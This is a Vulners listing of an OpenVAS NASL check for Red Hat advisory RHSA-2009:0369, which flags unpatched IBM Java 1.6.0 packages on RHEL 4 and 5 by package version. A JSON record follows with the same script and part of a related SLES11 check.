Search...

RedHat Security Advisory RHSA-2009:0369

2009-03-31T00:00:00

ID OPENVAS:136141256231063641
Type openvas
Reporter Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com
Modified 2018-04-06T00:00:00

Description

The remote host is missing updates announced in advisory RHSA-2009:0369.

The IBM® 1.6.0 Java release includes the IBM Java 2 Runtime Environment and the IBM Java 2 Software Development Kit.

This update fixes several vulnerabilities in the IBM Java 2 Runtime Environment and the IBM Java 2 Software Development Kit. These vulnerabilities are summarized on the IBM Security alerts page listed in the References section. (CVE-2008-5340, CVE-2008-5341, CVE-2008-5342, CVE-2008-5343, CVE-2008-5351, CVE-2008-5356, CVE-2008-5357, CVE-2008-5358)

All users of java-1.6.0-ibm are advised to upgrade to these updated packages, containing the IBM 1.6.0 SR4 Java release. All running instances of IBM Java must be restarted for the update to take effect.

                                        
                                            # OpenVAS Vulnerability Test
# $Id: RHSA_2009_0369.nasl 9350 2018-04-06 07:03:33Z cfischer $
# Description: Auto-generated from advisory RHSA-2009:0369 ()
#
# Authors:
# Thomas Reinke &lt;reinke@securityspace.com&gt;
#
# Copyright:
# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largely excerpted from the referenced
# advisory, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# or at your option, GNU General Public License version 3,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

include("revisions-lib.inc");
tag_summary = "The remote host is missing updates announced in
advisory RHSA-2009:0369.

The IBM® 1.6.0 Java release includes the IBM Java 2 Runtime Environment
and the IBM Java 2 Software Development Kit.

This update fixes several vulnerabilities in the IBM Java 2 Runtime
Environment and the IBM Java 2 Software Development Kit. These
vulnerabilities are summarized on the IBM Security alerts page listed in
the References section. (CVE-2008-5340, CVE-2008-5341, CVE-2008-5342,
CVE-2008-5343, CVE-2008-5351, CVE-2008-5356, CVE-2008-5357, CVE-2008-5358)

All users of java-1.6.0-ibm are advised to upgrade to these updated
packages, containing the IBM 1.6.0 SR4 Java release. All running instances
of IBM Java must be restarted for the update to take effect.";

tag_solution = "Please note that this update is available via
Red Hat Network.  To use Red Hat Network, launch the Red
Hat Update Agent with the following command: up2date";



if(description)
{
 script_oid("1.3.6.1.4.1.25623.1.0.63641");
 script_version("$Revision: 9350 $");
 script_tag(name:"last_modification", value:"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $");
 script_tag(name:"creation_date", value:"2009-03-31 19:20:21 +0200 (Tue, 31 Mar 2009)");
 script_cve_id("CVE-2008-5340", "CVE-2008-5341", "CVE-2008-5342", "CVE-2008-5343", "CVE-2008-5351", "CVE-2008-5356", "CVE-2008-5357", "CVE-2008-5358");
 script_tag(name:"cvss_base", value:"10.0");
 script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
 script_name("RedHat Security Advisory RHSA-2009:0369");



 script_category(ACT_GATHER_INFO);

 script_copyright("Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com");
 script_family("Red Hat Local Security Checks");
 script_dependencies("gather-package-list.nasl");
 script_mandatory_keys("ssh/login/rhel", "ssh/login/rpms");
 script_tag(name : "solution" , value : tag_solution);
 script_tag(name : "summary" , value : tag_summary);
 script_tag(name:"qod_type", value:"package");
 script_tag(name:"solution_type", value:"VendorFix");
 script_xref(name : "URL" , value : "http://rhn.redhat.com/errata/RHSA-2009-0369.html");
 script_xref(name : "URL" , value : "http://www.redhat.com/security/updates/classification/#critical");
 script_xref(name : "URL" , value : "http://www.ibm.com/developerworks/java/jdk/alerts/");
 exit(0);
}

#
# The script code starts here
#

include("pkg-lib-rpm.inc");

res = "";
report = "";
if ((res = isrpmvuln(pkg:"java-1.6.0-ibm", rpm:"java-1.6.0-ibm~1.6.0.4~1jpp.1.el4", rls:"RHENT_4")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"java-1.6.0-ibm-demo", rpm:"java-1.6.0-ibm-demo~1.6.0.4~1jpp.1.el4", rls:"RHENT_4")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"java-1.6.0-ibm-devel", rpm:"java-1.6.0-ibm-devel~1.6.0.4~1jpp.1.el4", rls:"RHENT_4")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"java-1.6.0-ibm-javacomm", rpm:"java-1.6.0-ibm-javacomm~1.6.0.4~1jpp.1.el4", rls:"RHENT_4")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"java-1.6.0-ibm-jdbc", rpm:"java-1.6.0-ibm-jdbc~1.6.0.4~1jpp.1.el4", rls:"RHENT_4")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"java-1.6.0-ibm-plugin", rpm:"java-1.6.0-ibm-plugin~1.6.0.4~1jpp.1.el4", rls:"RHENT_4")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"java-1.6.0-ibm-src", rpm:"java-1.6.0-ibm-src~1.6.0.4~1jpp.1.el4", rls:"RHENT_4")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"java-1.6.0-ibm", rpm:"java-1.6.0-ibm~1.6.0.4~1jpp.1.el5", rls:"RHENT_5")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"java-1.6.0-ibm-accessibility", rpm:"java-1.6.0-ibm-accessibility~1.6.0.4~1jpp.1.el5", rls:"RHENT_5")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"java-1.6.0-ibm-demo", rpm:"java-1.6.0-ibm-demo~1.6.0.4~1jpp.1.el5", rls:"RHENT_5")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"java-1.6.0-ibm-devel", rpm:"java-1.6.0-ibm-devel~1.6.0.4~1jpp.1.el5", rls:"RHENT_5")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"java-1.6.0-ibm-javacomm", rpm:"java-1.6.0-ibm-javacomm~1.6.0.4~1jpp.1.el5", rls:"RHENT_5")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"java-1.6.0-ibm-jdbc", rpm:"java-1.6.0-ibm-jdbc~1.6.0.4~1jpp.1.el5", rls:"RHENT_5")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"java-1.6.0-ibm-plugin", rpm:"java-1.6.0-ibm-plugin~1.6.0.4~1jpp.1.el5", rls:"RHENT_5")) != NULL) {
    report += res;
}
if ((res = isrpmvuln(pkg:"java-1.6.0-ibm-src", rpm:"java-1.6.0-ibm-src~1.6.0.4~1jpp.1.el5", rls:"RHENT_5")) != NULL) {
    report += res;
}

if (report != "") {
    security_message(data:report);
} else if (__pkg_match) {
    exit(99); # Not vulnerable.
}

JSON Vulners Source

Initial Source

{"id": "OPENVAS:136141256231063641", "type": "openvas", "bulletinFamily": "scanner", "title": "RedHat Security Advisory RHSA-2009:0369", "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:0369.\n\nThe IBM\u00ae 1.6.0 Java release includes the IBM Java 2 Runtime Environment\nand the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2008-5340, CVE-2008-5341, CVE-2008-5342,\nCVE-2008-5343, CVE-2008-5351, CVE-2008-5356, CVE-2008-5357, CVE-2008-5358)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR4 Java release. All running instances\nof IBM Java must be restarted for the update to take effect.", "published": "2009-03-31T00:00:00", "modified": "2018-04-06T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063641", "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "references": ["http://www.redhat.com/security/updates/classification/#critical", "http://www.ibm.com/developerworks/java/jdk/alerts/", "http://rhn.redhat.com/errata/RHSA-2009-0369.html"], "cvelist": ["CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5343", "CVE-2008-5357", "CVE-2008-5356", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5351"], "lastseen": "2018-04-06T11:38:51", "viewCount": 1, "enchantments": {"score": {"value": 9.7, "vector": "NONE", "modified": "2018-04-06T11:38:51", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:63641", "OPENVAS:835195", "OPENVAS:102041", "OPENVAS:65489", "OPENVAS:136141256231065907", "OPENVAS:136141256231065641", "OPENVAS:65641", "OPENVAS:1361412562310835195", "OPENVAS:136141256231063190", "OPENVAS:1361412562310102041"]}, {"type": "nessus", "idList": ["MACOSX_JAVA_10_5_UPDATE3.NASL", "SUN_JAVA_JRE_244986.NASL", "REDHAT-RHSA-2009-0369.NASL", "SUSE_JAVA-1_5_0-IBM-5960.NASL", "SUSE_JAVA-1_4_2-SUN-5852.NASL", "SUSE_11_JAVA-1_6_0-IBM-090405.NASL", "REDHAT-RHSA-2009-0016.NASL", "SUSE9_12336.NASL", "SUN_JAVA_JRE_244986_UNIX.NASL", "MACOSX_JAVA_REL8.NASL"]}, {"type": "redhat", "idList": ["RHSA-2008:1018", "RHSA-2009:0466", "RHSA-2009:0445", "RHSA-2009:0369", "RHSA-2009:0016", "RHSA-2008:1025"]}, {"type": "cve", "idList": ["CVE-2008-5342", "CVE-2008-5357", "CVE-2008-5358", "CVE-2008-5356", "CVE-2008-5340", "CVE-2008-5341", "CVE-2008-5343", "CVE-2008-5351"]}, {"type": "suse", "idList": ["SUSE-SA:2009:001", "SUSE-SA:2009:007", "SUSE-SA:2009:018"]}, {"type": "seebug", "idList": ["SSV:4532"]}, {"type": "vmware", "idList": ["VMSA-2009-0014"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:9483", "SECURITYVULNS:DOC:21257"]}, {"type": "ubuntu", "idList": ["USN-713-1"]}, {"type": "gentoo", "idList": ["GLSA-200911-02"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2009-099563"]}], "modified": "2018-04-06T11:38:51", "rev": 2}, "vulnersScore": 9.7}, "pluginID": "136141256231063641", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_0369.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:0369 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:0369.\n\nThe IBM\u00ae 1.6.0 Java release includes the IBM Java 2 Runtime Environment\nand the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2008-5340, CVE-2008-5341, CVE-2008-5342,\nCVE-2008-5343, CVE-2008-5351, CVE-2008-5356, CVE-2008-5357, CVE-2008-5358)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR4 Java release. All running instances\nof IBM Java must be restarted for the update to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63641\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-31 19:20:21 +0200 (Tue, 31 Mar 2009)\");\n script_cve_id(\"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5351\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:0369\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-0369.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n script_xref(name : \"URL\" , value : \"http://www.ibm.com/developerworks/java/jdk/alerts/\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm\", rpm:\"java-1.6.0-ibm~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-demo\", rpm:\"java-1.6.0-ibm-demo~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-devel\", rpm:\"java-1.6.0-ibm-devel~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-javacomm\", rpm:\"java-1.6.0-ibm-javacomm~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-jdbc\", rpm:\"java-1.6.0-ibm-jdbc~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-plugin\", rpm:\"java-1.6.0-ibm-plugin~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-src\", rpm:\"java-1.6.0-ibm-src~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm\", rpm:\"java-1.6.0-ibm~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-accessibility\", rpm:\"java-1.6.0-ibm-accessibility~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-demo\", rpm:\"java-1.6.0-ibm-demo~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-devel\", rpm:\"java-1.6.0-ibm-devel~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-javacomm\", rpm:\"java-1.6.0-ibm-javacomm~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-jdbc\", rpm:\"java-1.6.0-ibm-jdbc~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-plugin\", rpm:\"java-1.6.0-ibm-plugin~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-src\", rpm:\"java-1.6.0-ibm-src~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "Red Hat Local Security Checks"}

{"openvas": [{"lastseen": "2017-07-27T10:56:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5343", "CVE-2008-5357", "CVE-2008-5356", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5351"], "description": "The remote host is missing updates announced in\nadvisory RHSA-2009:0369.\n\nThe IBM\u00ae 1.6.0 Java release includes the IBM Java 2 Runtime Environment\nand the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2008-5340, CVE-2008-5341, CVE-2008-5342,\nCVE-2008-5343, CVE-2008-5351, CVE-2008-5356, CVE-2008-5357, CVE-2008-5358)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR4 Java release. All running instances\nof IBM Java must be restarted for the update to take effect.", "modified": "2017-07-12T00:00:00", "published": "2009-03-31T00:00:00", "id": "OPENVAS:63641", "href": "http://plugins.openvas.org/nasl.php?oid=63641", "type": "openvas", "title": "RedHat Security Advisory RHSA-2009:0369", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: RHSA_2009_0369.nasl 6683 2017-07-12 09:41:57Z cfischer $\n# Description: Auto-generated from advisory RHSA-2009:0369 ()\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates announced in\nadvisory RHSA-2009:0369.\n\nThe IBM\u00ae 1.6.0 Java release includes the IBM Java 2 Runtime Environment\nand the IBM Java 2 Software Development Kit.\n\nThis update fixes several vulnerabilities in the IBM Java 2 Runtime\nEnvironment and the IBM Java 2 Software Development Kit. These\nvulnerabilities are summarized on the IBM Security alerts page listed in\nthe References section. (CVE-2008-5340, CVE-2008-5341, CVE-2008-5342,\nCVE-2008-5343, CVE-2008-5351, CVE-2008-5356, CVE-2008-5357, CVE-2008-5358)\n\nAll users of java-1.6.0-ibm are advised to upgrade to these updated\npackages, containing the IBM 1.6.0 SR4 Java release. All running instances\nof IBM Java must be restarted for the update to take effect.\";\n\ntag_solution = \"Please note that this update is available via\nRed Hat Network. To use Red Hat Network, launch the Red\nHat Update Agent with the following command: up2date\";\n\n\n\nif(description)\n{\n script_id(63641);\n script_version(\"$Revision: 6683 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:41:57 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-31 19:20:21 +0200 (Tue, 31 Mar 2009)\");\n script_cve_id(\"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5351\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"RedHat Security Advisory RHSA-2009:0369\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://rhn.redhat.com/errata/RHSA-2009-0369.html\");\n script_xref(name : \"URL\" , value : \"http://www.redhat.com/security/updates/classification/#critical\");\n script_xref(name : \"URL\" , value : \"http://www.ibm.com/developerworks/java/jdk/alerts/\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm\", rpm:\"java-1.6.0-ibm~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-demo\", rpm:\"java-1.6.0-ibm-demo~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-devel\", rpm:\"java-1.6.0-ibm-devel~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-javacomm\", rpm:\"java-1.6.0-ibm-javacomm~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-jdbc\", rpm:\"java-1.6.0-ibm-jdbc~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-plugin\", rpm:\"java-1.6.0-ibm-plugin~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-src\", rpm:\"java-1.6.0-ibm-src~1.6.0.4~1jpp.1.el4\", rls:\"RHENT_4\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm\", rpm:\"java-1.6.0-ibm~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-accessibility\", rpm:\"java-1.6.0-ibm-accessibility~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-demo\", rpm:\"java-1.6.0-ibm-demo~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-devel\", rpm:\"java-1.6.0-ibm-devel~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-javacomm\", rpm:\"java-1.6.0-ibm-javacomm~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-jdbc\", rpm:\"java-1.6.0-ibm-jdbc~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-plugin\", rpm:\"java-1.6.0-ibm-plugin~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1.6.0-ibm-src\", rpm:\"java-1.6.0-ibm-src~1.6.0.4~1jpp.1.el5\", rls:\"RHENT_5\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:38:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5357", "CVE-2008-5356", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5351"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java-1_6_0-ibm\n java-1_6_0-ibm-alsa\n java-1_6_0-ibm-fonts\n java-1_6_0-ibm-jdbc\n java-1_6_0-ibm-plugin\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2018-04-06T00:00:00", "published": "2009-10-11T00:00:00", "id": "OPENVAS:136141256231065641", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231065641", "type": "openvas", "title": "SLES11: Security update for IBM Java 1.6.0", "sourceData": "#\n#VID 7d9a96f54ebbdea55cd9630e7b8de703\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for IBM Java 1.6.0\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. One or more of the following packages\nare affected:\n\n java-1_6_0-ibm\n java-1_6_0-ibm-alsa\n java-1_6_0-ibm-fonts\n java-1_6_0-ibm-jdbc\n java-1_6_0-ibm-plugin\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=489052\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.65641\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-11 22:58:51 +0200 (Sun, 11 Oct 2009)\");\n script_cve_id(\"CVE-2008-5341\", \"CVE-2008-5340\", \"CVE-2008-5351\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5342\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES11: Security update for IBM Java 1.6.0\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1_6_0-ibm\", rpm:\"java-1_6_0-ibm~1.6.0~124.6.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-ibm-alsa\", 